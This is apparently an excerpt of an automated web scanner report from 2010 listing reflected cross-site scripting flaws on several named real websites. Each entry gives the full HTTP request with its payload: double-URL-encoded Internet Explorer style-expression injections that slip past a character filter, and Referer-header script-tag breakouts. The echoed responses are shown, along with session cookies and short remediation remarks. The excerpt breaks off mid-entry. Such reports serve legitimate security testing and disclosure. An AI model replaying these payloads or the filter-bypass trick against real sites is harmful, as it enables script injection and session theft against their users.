GET /turner_returns_exchanges?440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.252. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_shipping_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88d10'style='x:expression(alert(1))'7e7db22553f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_shipping_information?88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.253. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99d68'style='x:expression(alert(1))'12a287f255c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_sitemap?99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.254. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_tax_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5957e'style='x:expression(alert(1))'a5b65f5204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_tax_information?5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.255. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 997ed'style='x:expression(alert(1))'137726c367f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_wall_calendars?997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e32"><script>alert(1)</script>2ff90f879e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 61e32"><script>alert(1)</script>2ff90f879e5
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:51:33 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-15 Content-Length: 19291
<?xml version="1.0" encoding="iso-8859-15"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xml:lang="de" xmlns="http://www.w3.org/1999/x ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Corporate+Design&blogurl=61e32"><script>alert(1)</script>2ff90f879e5&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d505'-alert(1)-'0d4c7940df5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/14121087 HTTP/1.1 Host: player.vimeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6d505'-alert(1)-'0d4c7940df5
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:56:30 GMT Server: Apache X-Powered-By: PHP/5.3.3 X-Server: 10.90.6.247 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Expires: Fri, 25 Feb 1983 09:30:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Content-Length: 6182 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Tutorial: How do I ask a question?</title><script src="http://a.vimeocdn.com/js/player_combined.opt.js?e7a9f"></script><style>div{marg ...[SNIP]... 'player_type_flash') {if ( ! swfobject.hasFlashPlayerVersion('10')) {$('j').setStyle('display','block');}}player_14121087 = new MoogEmbed($('a'),'player_14121087','http://www.google.com/search?hl=en&q=6d505'-alert(1)-'0d4c7940df5',options);};window.onresize = function() {if ((document.height < 150 || document.width < 250 ) && $('e')) {$('e').addClass('o');}};window.onresize();</script> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d682"><script>alert(1)</script>55b3a133a2e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1d682"><script>alert(1)</script>55b3a133a2e
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:56:12 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=1d682"><script>alert(1)</script>55b3a133a2e" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4af9b<script>alert(1)</script>c58dc0cb1ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4af9b<script>alert(1)</script>c58dc0cb1ea
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:56:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>4af9b<script>alert(1)</script>c58dc0cb1ea - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24bbb"><script>alert(1)</script>061fe809956 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:16:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 30883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=24bbb"><script>alert(1)</script>061fe809956" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50263"><script>alert(1)</script>1d91c58b3ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /consultation.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=50263"><script>alert(1)</script>1d91c58b3ff
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 33982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=50263"><script>alert(1)</script>1d91c58b3ff" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31be5"><script>alert(1)</script>e07c7004476 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /landing_pages/states/california.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=31be5"><script>alert(1)</script>e07c7004476
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><link href="../../App_T ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=31be5"><script>alert(1)</script>e07c7004476" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237bf"><script>alert(1)</script>340897b84e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /regional.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=237bf"><script>alert(1)</script>340897b84e7
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=237bf"><script>alert(1)</script>340897b84e7" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b07c"><script>alert(1)</script>721f7500c50 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/additional_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=5b07c"><script>alert(1)</script>721f7500c50
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 33356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=5b07c"><script>alert(1)</script>721f7500c50" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c55"><script>alert(1)</script>00fa49d82d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/cloud_computing.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=89c55"><script>alert(1)</script>00fa49d82d7
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 28697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=89c55"><script>alert(1)</script>00fa49d82d7" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30575"><script>alert(1)</script>625d9dfb404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/faq.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=30575"><script>alert(1)</script>625d9dfb404
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34173
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=30575"><script>alert(1)</script>625d9dfb404" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58913"><script>alert(1)</script>7a9d1e18438 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
